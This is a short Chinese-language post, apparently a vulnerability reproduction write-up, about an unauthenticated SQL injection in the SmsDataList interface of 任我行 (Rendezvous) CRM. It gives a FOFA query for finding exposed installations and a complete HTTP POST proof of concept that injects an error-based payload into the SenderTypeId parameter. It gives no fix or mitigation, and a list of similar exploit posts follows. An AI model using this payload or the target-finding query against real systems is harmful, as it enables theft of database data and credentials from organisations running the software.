Rendezvous CRM SQL 注入漏洞再次发生
最编程
2024-04-30 20:11:14
...
0x01 产品简介
任我行CRM(Customer Relationship Management)是一款专业的企业级CRM软件,旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。
0x02 漏洞概述
任我行 CRM SmsDataList 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
0x03 复现环境
FOFA:"欢迎使用任我行CRM"
0x04 漏洞复现
PoC
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI
推荐阅读
-
Rendezvous CRM SQL 注入漏洞再次发生
-
Rendezvous CRM 系统中的 SQL 注入漏洞 [2023-HW]-I.产品描述
-
Netcom NS-ASG 应用程序安全网关 SQL 注入漏洞复制(CVE-2024-3458、CVE-2024-3457、CVE-2024-3456、CVE-2024-3455)
-
Epro OA ExecuteSqlForDataSet SQL 注入漏洞再次发生
-
[漏洞复制] DataEase 数据可视化分析工具 SQL 注入 - CVE-2023-40771
-
MyBatis Plus 高风险 SQL 注入漏洞:查询封装器
-
DataEase SQL 注入漏洞 (CVE-2022-34114)
-
无忧网络身份验证系统 getInfo SQL 注入漏洞再次发生
-
通达 OA 11.5 sql 注入漏洞再次发生
-
关于 CMSMS 中 SQL 注入漏洞的复制、分析和利用 - 前言